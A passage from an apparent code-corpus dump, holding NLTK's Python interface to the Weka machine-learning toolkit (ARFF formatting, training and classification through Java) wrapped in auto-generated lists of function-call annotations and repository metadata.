50), 'numpy.array', 'np.array', ({(540, 34, 540, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((603, 15, 603, 30), 'numpy.shape', 'np.shape', ({(603, 24, 603, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((604, 13, 604, 30), 'numpy.shape', 'np.shape', ({(604, 22, 604, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((605, 12, 605, 32), 'numpy.zeros', 'np.zeros', ({(605, 21, 605, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((606, 11, 606, 30), 'numpy.ones', 'np.ones', ({(606, 19, 606, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((610, 15, 610, 30), 'numpy.array', 'np.array', ({(610, 24, 610, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((611, 8, 611, 23), 'numpy.array', 'np.array', ({(611, 17, 611, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((613, 13, 613, 37), 'numpy.arange', 'np.arange', ({(613, 23, 613, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((614, 0, 614, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(614, 18, 614, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((615, 13, 615, 37), 'numpy.arange', 'np.arange', ({(615, 23, 615, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((616, 0, 616, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(616, 18, 616, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((617, 13, 617, 37), 'numpy.arange', 'np.arange', ({(617, 23, 617, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((618, 0, 618, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(618, 18, 618, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((621, 12, 621, 52), 'numpy.logical_not', 'np.logical_not', ({(621, 27, 621, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((623, 15, 623, 64), 'numpy.logical_or', 'np.logical_or', ({(623, 29, 623, 41): 'pruning_mask', (623, 43, 623, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((624, 12, 624, 45), 'numpy.reshape', 'np.reshape', ({(624, 23, 624, 32): 'init_mask', (624, 34, 624, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((628, 20, 628, 71), 'numpy.tile', 'np.tile', ({(628, 28, 628, 38): 'rand_map_0', (628, 39, 628, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((629, 20, 629, 71), 'numpy.tile', 'np.tile', ({(629, 28, 629, 38): 'rand_map_1', (629, 39, 629, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((630, 20, 630, 71), 'numpy.tile', 'np.tile', ({(630, 28, 630, 38): 'rand_map_2', (630, 39, 630, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((637, 15, 637, 53), 'numpy.reshape', 'np.reshape', ({(637, 26, 637, 38): 'bl_w1_rand_0', (637, 40, 637, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((712, 15, 712, 33), 'numpy.array', 'np.array', ({(712, 24, 712, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((713, 18, 713, 36), 'numpy.array', 'np.array', ({(713, 27, 713, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((714, 25, 714, 50), 'numpy.array', 'np.array', ({(714, 34, 714, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((737, 14, 737, 31), 'numpy.array', 'np.array', ({(737, 23, 737, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((738, 15, 738, 33), 'numpy.array', 'np.array', ({(738, 24, 738, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((739, 21, 739, 45), 'numpy.array', 'np.array', ({(739, 30, 739, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((740, 25, 740, 53), 'numpy.array', 'np.array', ({(740, 34, 740, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((753, 14, 753, 31), 'numpy.array', 'np.array', ({(753, 23, 753, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((754, 15, 754, 33), 'numpy.array', 'np.array', ({(754, 24, 754, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((755, 21, 755, 45), 'numpy.array', 'np.array', ({(755, 30, 755, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((756, 25, 756, 53), 'numpy.array', 'np.array', ({(756, 34, 756, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((769, 14, 769, 31), 'numpy.array', 'np.array', ({(769, 23, 769, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((770, 15, 770, 33), 'numpy.array', 'np.array', ({(770, 24, 770, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((771, 21, 771, 45), 'numpy.array', 'np.array', ({(771, 30, 771, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((772, 25, 772, 53), 'numpy.array', 'np.array', ({(772, 34, 772, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((785, 14, 785, 31), 'numpy.array', 'np.array', ({(785, 23, 785, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((786, 15, 786, 33), 'numpy.array', 'np.array', ({(786, 24, 786, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((787, 21, 787, 45), 'numpy.array', 'np.array', ({(787, 30, 787, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((788, 25, 788, 53), 'numpy.array', 'np.array', ({(788, 34, 788, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((801, 14, 801, 31), 'numpy.array', 'np.array', ({(801, 23, 801, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((802, 15, 802, 33), 'numpy.array', 'np.array', ({(802, 24, 802, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((803, 21, 803, 45), 'numpy.array', 'np.array', ({(803, 30, 803, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((804, 25, 804, 53), 'numpy.array', 'np.array', ({(804, 34, 804, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((85, 16, 85, 35), 'numpy.ones', 'np.ones', ({(85, 24, 85, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((100, 23, 100, 62), 'numpy.logical_and', 'np.logical_and', ({(100, 38, 100, 50): 'pruning_mask', (100, 52, 100, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((259, 16, 259, 35), 'numpy.ones', 'np.ones', ({(259, 24, 259, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((274, 23, 274, 62), 'numpy.logical_and', 'np.logical_and', ({(274, 38, 274, 50): 'pruning_mask', (274, 52, 274, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((433, 16, 433, 35), 'numpy.ones', 'np.ones', ({(433, 24, 433, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((448, 23, 448, 62), 'numpy.logical_and', 'np.logical_and', ({(448, 38, 448, 50): 'pruning_mask', (448, 52, 448, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((607, 16, 607, 35), 'numpy.ones', 'np.ones', ({(607, 24, 607, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((622, 23, 622, 62), 'numpy.logical_and', 'np.logical_and', ({(622, 38, 622, 50): 'pruning_mask', (622, 52, 622, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((18, 30, 18, 45), 'numpy.array', 'np.array', ({(18, 39, 18, 44): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((27, 13, 27, 38), 'numpy.array', 'np.array', ({(27, 22, 27, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((98, 15, 98, 40), 'numpy.array', 'np.array', ({(98, 24, 98, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((100, 63, 100, 85), 'numpy.argsort', 'np.argsort', ({(100, 74, 100, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((187, 23, 187, 53), 'numpy.reshape', 'np.reshape', ({(187, 34, 187, 44): 'rand_map_0', (187, 46, 187, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((188, 23, 188, 53), 'numpy.reshape', 'np.reshape', ({(188, 34, 188, 44): 'rand_map_1', (188, 46, 188, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((189, 23, 189, 53), 'numpy.reshape', 'np.reshape', ({(189, 34, 189, 44): 'rand_map_2', (189, 46, 189, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((194, 20, 194, 57), 'numpy.reshape', 'np.reshape', ({(194, 31, 194, 48): 'rand_map_0_expand', (194, 50, 194, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((196, 20, 196, 57), 'numpy.reshape', 'np.reshape', ({(196, 31, 196, 48): 'rand_map_1_expand', (196, 50, 196, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((198, 20, 198, 57), 'numpy.reshape', 'np.reshape', ({(198, 31, 198, 48): 'rand_map_2_expand', (198, 50, 198, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((201, 13, 201, 38), 'numpy.array', 'np.array', ({(201, 22, 201, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((272, 15, 272, 40), 'numpy.array', 'np.array', ({(272, 24, 272, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((274, 63, 274, 85), 'numpy.argsort', 'np.argsort', ({(274, 74, 274, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((361, 23, 361, 53), 'numpy.reshape', 'np.reshape', ({(361, 34, 361, 44): 'rand_map_0', (361, 46, 361, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((362, 23, 362, 53), 'numpy.reshape', 'np.reshape', ({(362, 34, 362, 44): 'rand_map_1', (362, 46, 362, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((363, 23, 363, 53), 'numpy.reshape', 'np.reshape', ({(363, 34, 363, 44): 'rand_map_2', (363, 46, 363, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((368, 20, 368, 57), 'numpy.reshape', 'np.reshape', ({(368, 31, 368, 48): 'rand_map_0_expand', (368, 50, 368, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((370, 20, 370, 57), 'numpy.reshape', 'np.reshape', ({(370, 31, 370, 48): 'rand_map_1_expand', (370, 50, 370, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((372, 20, 372, 57), 'numpy.reshape', 'np.reshape', ({(372, 31, 372, 48): 'rand_map_2_expand', (372, 50, 372, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((375, 13, 375, 38), 'numpy.array', 'np.array', ({(375, 22, 375, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((446, 15, 446, 40), 'numpy.array', 'np.array', ({(446, 24, 446, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((448, 63, 448, 85), 'numpy.argsort', 'np.argsort', ({(448, 74, 448, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((535, 23, 535, 53), 'numpy.reshape', 'np.reshape', ({(535, 34, 535, 44): 'rand_map_0', (535, 46, 535, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((536, 23, 536, 53), 'numpy.reshape', 'np.reshape', ({(536, 34, 536, 44): 'rand_map_1', (536, 46, 536, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((537, 23, 537, 53), 'numpy.reshape', 'np.reshape', ({(537, 34, 537, 44): 'rand_map_2', (537, 46, 537, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((542, 20, 542, 57), 'numpy.reshape', 'np.reshape', ({(542, 31, 542, 48): 'rand_map_0_expand', (542, 50, 542, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((544, 20, 544, 57), 'numpy.reshape', 'np.reshape', ({(544, 31, 544, 48): 'rand_map_1_expand', (544, 50, 544, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((546, 20, 546, 57), 'numpy.reshape', 'np.reshape', ({(546, 31, 546, 48): 'rand_map_2_expand', (546, 50, 546, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((549, 13, 549, 38), 'numpy.array', 'np.array', ({(549, 22, 549, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((620, 15, 620, 40), 'numpy.array', 'np.array', ({(620, 24, 620, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((622, 63, 622, 85), 'numpy.argsort', 'np.argsort', ({(622, 74, 622, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((709, 23, 709, 53), 'numpy.reshape', 'np.reshape', ({(709, 34, 709, 44): 'rand_map_0', (709, 46, 709, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((710, 23, 710, 53), 'numpy.reshape', 'np.reshape', ({(710, 34, 710, 44): 'rand_map_1', (710, 46, 710, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((711, 23, 711, 53), 'numpy.reshape', 'np.reshape', ({(711, 34, 711, 44): 'rand_map_2', (711, 46, 711, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((716, 20, 716, 57), 'numpy.reshape', 'np.reshape', ({(716, 31, 716, 48): 'rand_map_0_expand', (716, 50, 716, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((718, 20, 718, 57), 'numpy.reshape', 'np.reshape', ({(718, 31, 718, 48): 'rand_map_1_expand', (718, 50, 718, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((720, 20, 720, 57), 'numpy.reshape', 'np.reshape', ({(720, 31, 720, 48): 'rand_map_2_expand', (720, 50, 720, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((723, 13, 723, 38), 'numpy.array', 'np.array', ({(723, 22, 723, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((27, 58, 27, 83), 'numpy.array', 'np.array', ({(27, 67, 27, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((201, 58, 201, 83), 'numpy.array', 'np.array', ({(201, 67, 201, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((375, 58, 375, 83), 'numpy.array', 'np.array', ({(375, 67, 375, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((549, 58, 549, 83), 'numpy.array', 'np.array', ({(549, 67, 549, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((723, 58, 723, 83), 'numpy.array', 'np.array', ({(723, 67, 723, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n')]
wangyum/anaconda
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
6e5a0dbead3327661d73a61e85414cf92aa52be6
# Natural Language Toolkit: Interface to Weka Classsifiers # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <[email protected]> # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Classifiers that make use of the external 'Weka' package. """ from __future__ import print_function import time import tempfile import os import subprocess import re import zipfile from sys import stdin from nltk import compat from nltk.probability import DictionaryProbDist from nltk.internals import java, config_java from nltk.classify.api import ClassifierI _weka_classpath = None _weka_search = ['.', '/usr/share/weka', '/usr/local/share/weka', '/usr/lib/weka', '/usr/local/lib/weka',] def config_weka(classpath=None): global _weka_classpath # Make sure java's configured first. config_java() if classpath is not None: _weka_classpath = classpath if _weka_classpath is None: searchpath = _weka_search if 'WEKAHOME' in os.environ: searchpath.insert(0, os.environ['WEKAHOME']) for path in searchpath: if os.path.exists(os.path.join(path, 'weka.jar')): _weka_classpath = os.path.join(path, 'weka.jar') version = _check_weka_version(_weka_classpath) if version: print(('[Found Weka: %s (version %s)]' % (_weka_classpath, version))) else: print('[Found Weka: %s]' % _weka_classpath) _check_weka_version(_weka_classpath) if _weka_classpath is None: raise LookupError('Unable to find weka.jar! Use config_weka() ' 'or set the WEKAHOME environment variable. ' 'For more information about Weka, please see ' 'http://www.cs.waikato.ac.nz/ml/weka/') def _check_weka_version(jar): try: zf = zipfile.ZipFile(jar) except SystemExit as KeyboardInterrupt: raise except: return None try: try: return zf.read('weka/core/version.txt') except KeyError: return None finally: zf.close() class WekaClassifier(ClassifierI): def __init__(self, formatter, model_filename): self._formatter = formatter self._model = model_filename def prob_classify_many(self, featuresets): return self._classify_many(featuresets, ['-p', '0', '-distribution']) def classify_many(self, featuresets): return self._classify_many(featuresets, ['-p', '0']) def _classify_many(self, featuresets, options): # Make sure we can find java & weka. config_weka() temp_dir = tempfile.mkdtemp() try: # Write the test data file. test_filename = os.path.join(temp_dir, 'test.arff') self._formatter.write(test_filename, featuresets) # Call weka to classify the data. cmd = ['weka.classifiers.bayes.NaiveBayes', '-l', self._model, '-T', test_filename] + options (stdout, stderr) = java(cmd, classpath=_weka_classpath, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Check if something went wrong: if stderr and not stdout: if 'Illegal options: -distribution' in stderr: raise ValueError('The installed version of weka does ' 'not support probability distribution ' 'output.') else: raise ValueError('Weka failed to generate output:\n%s' % stderr) # Parse weka's output. return self.parse_weka_output(stdout.decode(stdin.encoding).split('\n')) finally: for f in os.listdir(temp_dir): os.remove(os.path.join(temp_dir, f)) os.rmdir(temp_dir) def parse_weka_distribution(self, s): probs = [float(v) for v in re.split('[*,]+', s) if v.strip()] probs = dict(zip(self._formatter.labels(), probs)) return DictionaryProbDist(probs) def parse_weka_output(self, lines): # Strip unwanted text from stdout for i,line in enumerate(lines): if line.strip().startswith("inst#"): lines = lines[i:] break if lines[0].split() == ['inst#', 'actual', 'predicted', 'error', 'prediction']: return [line.split()[2].split(':')[1] for line in lines[1:] if line.strip()] elif lines[0].split() == ['inst#', 'actual', 'predicted', 'error', 'distribution']: return [self.parse_weka_distribution(line.split()[-1]) for line in lines[1:] if line.strip()] # is this safe:? elif re.match(r'^0 \w+ [01]\.[0-9]* \?\s*$', lines[0]): return [line.split()[1] for line in lines if line.strip()] else: for line in lines[:10]: print(line) raise ValueError('Unhandled output format -- your version ' 'of weka may not be supported.\n' ' Header: %s' % lines[0]) # [xx] full list of classifiers (some may be abstract?): # ADTree, AODE, BayesNet, ComplementNaiveBayes, ConjunctiveRule, # DecisionStump, DecisionTable, HyperPipes, IB1, IBk, Id3, J48, # JRip, KStar, LBR, LeastMedSq, LinearRegression, LMT, Logistic, # LogisticBase, M5Base, MultilayerPerceptron, # MultipleClassifiersCombiner, NaiveBayes, NaiveBayesMultinomial, # NaiveBayesSimple, NBTree, NNge, OneR, PaceRegression, PART, # PreConstructedLinearModel, Prism, RandomForest, # RandomizableClassifier, RandomTree, RBFNetwork, REPTree, Ridor, # RuleNode, SimpleLinearRegression, SimpleLogistic, # SingleClassifierEnhancer, SMO, SMOreg, UserClassifier, VFI, # VotedPerceptron, Winnow, ZeroR _CLASSIFIER_CLASS = { 'naivebayes': 'weka.classifiers.bayes.NaiveBayes', 'C4.5': 'weka.classifiers.trees.J48', 'log_regression': 'weka.classifiers.functions.Logistic', 'svm': 'weka.classifiers.functions.SMO', 'kstar': 'weka.classifiers.lazy.KStar', 'ripper': 'weka.classifiers.rules.JRip', } @classmethod def train(cls, model_filename, featuresets, classifier='naivebayes', options=[], quiet=True): # Make sure we can find java & weka. config_weka() # Build an ARFF formatter. formatter = ARFF_Formatter.from_train(featuresets) temp_dir = tempfile.mkdtemp() try: # Write the training data file. train_filename = os.path.join(temp_dir, 'train.arff') formatter.write(train_filename, featuresets) if classifier in cls._CLASSIFIER_CLASS: javaclass = cls._CLASSIFIER_CLASS[classifier] elif classifier in cls._CLASSIFIER_CLASS.values(): javaclass = classifier else: raise ValueError('Unknown classifier %s' % classifier) # Train the weka model. cmd = [javaclass, '-d', model_filename, '-t', train_filename] cmd += list(options) if quiet: stdout = subprocess.PIPE else: stdout = None java(cmd, classpath=_weka_classpath, stdout=stdout) # Return the new classifier. return WekaClassifier(formatter, model_filename) finally: for f in os.listdir(temp_dir): os.remove(os.path.join(temp_dir, f)) os.rmdir(temp_dir) class ARFF_Formatter: """ Converts featuresets and labeled featuresets to ARFF-formatted strings, appropriate for input into Weka. Features and classes can be specified manually in the constructor, or may be determined from data using ``from_train``. """ def __init__(self, labels, features): """ :param labels: A list of all class labels that can be generated. :param features: A list of feature specifications, where each feature specification is a tuple (fname, ftype); and ftype is an ARFF type string such as NUMERIC or STRING. """ self._labels = labels self._features = features def format(self, tokens): """Returns a string representation of ARFF output for the given data.""" return self.header_section() + self.data_section(tokens) def labels(self): """Returns the list of classes.""" return list(self._labels) def write(self, outfile, tokens): """Writes ARFF data to a file for the given data.""" if not hasattr(outfile, 'write'): outfile = open(outfile, 'w') outfile.write(self.format(tokens)) outfile.close() @staticmethod def from_train(tokens): """ Constructs an ARFF_Formatter instance with class labels and feature types determined from the given data. Handles boolean, numeric and string (note: not nominal) types. """ # Find the set of all attested labels. labels = set(label for (tok, label) in tokens) # Determine the types of all features. features = {} for tok, label in tokens: for (fname, fval) in tok.items(): if issubclass(type(fval), bool): ftype = '{True, False}' elif issubclass(type(fval), (compat.integer_types, float, bool)): ftype = 'NUMERIC' elif issubclass(type(fval), compat.string_types): ftype = 'STRING' elif fval is None: continue # can't tell the type. else: raise ValueError('Unsupported value type %r' % ftype) if features.get(fname, ftype) != ftype: raise ValueError('Inconsistent type for %s' % fname) features[fname] = ftype features = sorted(features.items()) return ARFF_Formatter(labels, features) def header_section(self): """Returns an ARFF header as a string.""" # Header comment. s = ('% Weka ARFF file\n' + '% Generated automatically by NLTK\n' + '%% %s\n\n' % time.ctime()) # Relation name s += '@RELATION rel\n\n' # Input attribute specifications for fname, ftype in self._features: s += '@ATTRIBUTE %-30r %s\n' % (fname, ftype) # Label attribute specification s += '@ATTRIBUTE %-30r {%s}\n' % ('-label-', ','.join(self._labels)) return s def data_section(self, tokens, labeled=None): """ Returns the ARFF data section for the given data. :param tokens: a list of featuresets (dicts) or labelled featuresets which are tuples (featureset, label). :param labeled: Indicates whether the given tokens are labeled or not. If None, then the tokens will be assumed to be labeled if the first token's value is a tuple or list. """ # Check if the tokens are labeled or unlabeled. If unlabeled, # then use 'None' if labeled is None: labeled = tokens and isinstance(tokens[0], (tuple, list)) if not labeled: tokens = [(tok, None) for tok in tokens] # Data section s = '\n@DATA\n' for (tok, label) in tokens: for fname, ftype in self._features: s += '%s,' % self._fmt_arff_val(tok.get(fname)) s += '%s\n' % self._fmt_arff_val(label) return s def _fmt_arff_val(self, fval): if fval is None: return '?' elif isinstance(fval, (bool, compat.integer_types)): return '%s' % fval elif isinstance(fval, float): return '%r' % fval else: return '%r' % fval if __name__ == '__main__': from nltk.classify.util import names_demo, binary_names_demo_features def make_classifier(featuresets): return WekaClassifier.train('/tmp/name.model', featuresets, 'C4.5') classifier = names_demo(make_classifier, binary_names_demo_features)
[((36, 4, 36, 17), 'nltk.internals.config_java', 'config_java', ({}, {}), '()', False, 'from nltk.internals import java, config_java\n'), ((345, 17, 345, 72), 'nltk.classify.util.names_demo', 'names_demo', ({(345, 28, 345, 43): 'make_classifier', (345, 45, 345, 71): 'binary_names_demo_features'}, {}), '(make_classifier, binary_names_demo_features)', False, 'from nltk.classify.util import names_demo, binary_names_demo_features\n'), ((65, 13, 65, 33), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(65, 29, 65, 32): 'jar'}, {}), '(jar)', False, 'import zipfile\n'), ((93, 19, 93, 37), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((127, 15, 127, 40), 'nltk.probability.DictionaryProbDist', 'DictionaryProbDist', ({(127, 34, 127, 39): 'probs'}, {}), '(probs)', False, 'from nltk.probability import DictionaryProbDist\n'), ((187, 19, 187, 37), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((96, 28, 96, 63), 'os.path.join', 'os.path.join', ({(96, 41, 96, 49): 'temp_dir', (96, 51, 96, 62): '"""test.arff"""'}, {}), "(temp_dir, 'test.arff')", False, 'import os\n'), ((102, 31, 104, 59), 'nltk.internals.java', 'java', (), '', False, 'from nltk.internals import java, config_java\n'), ((120, 21, 120, 41), 'os.listdir', 'os.listdir', ({(120, 32, 120, 40): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((122, 12, 122, 30), 'os.rmdir', 'os.rmdir', ({(122, 21, 122, 29): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((190, 29, 190, 65), 'os.path.join', 'os.path.join', ({(190, 42, 190, 50): 'temp_dir', (190, 52, 190, 64): '"""train.arff"""'}, {}), "(temp_dir, 'train.arff')", False, 'import os\n'), ((206, 12, 206, 63), 'nltk.internals.java', 'java', (), '', False, 'from nltk.internals import java, config_java\n'), ((212, 21, 212, 41), 'os.listdir', 'os.listdir', ({(212, 32, 212, 40): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((214, 12, 214, 30), 'os.rmdir', 'os.rmdir', ({(214, 21, 214, 29): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((47, 30, 47, 60), 'os.path.join', 'os.path.join', ({(47, 43, 47, 47): 'path', (47, 49, 47, 59): '"""weka.jar"""'}, {}), "(path, 'weka.jar')", False, 'import os\n'), ((48, 34, 48, 64), 'os.path.join', 'os.path.join', ({(48, 47, 48, 51): 'path', (48, 53, 48, 63): '"""weka.jar"""'}, {}), "(path, 'weka.jar')", False, 'import os\n'), ((125, 35, 125, 55), 're.split', 're.split', ({(125, 44, 125, 51): '"""[*,]+"""', (125, 53, 125, 54): 's'}, {}), "('[*,]+', s)", False, 'import re\n'), ((146, 13, 146, 62), 're.match', 're.match', ({(146, 22, 146, 51): '"""^0 \\\\w+ [01]\\\\.[0-9]* \\\\?\\\\s*$"""', (146, 53, 146, 61): 'lines[0]'}, {}), "('^0 \\\\w+ [01]\\\\.[0-9]* \\\\?\\\\s*$', lines[0])", False, 'import re\n'), ((289, 27, 289, 39), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time\n'), ((121, 26, 121, 51), 'os.path.join', 'os.path.join', ({(121, 39, 121, 47): 'temp_dir', (121, 49, 121, 50): 'f'}, {}), '(temp_dir, f)', False, 'import os\n'), ((213, 26, 213, 51), 'os.path.join', 'os.path.join', ({(213, 39, 213, 47): 'temp_dir', (213, 49, 213, 50): 'f'}, {}), '(temp_dir, f)', False, 'import os\n')]
pg428/SIB
src/si/data/dataset.py
b887c2011eb3a04d119a93b3932785d182e331d3
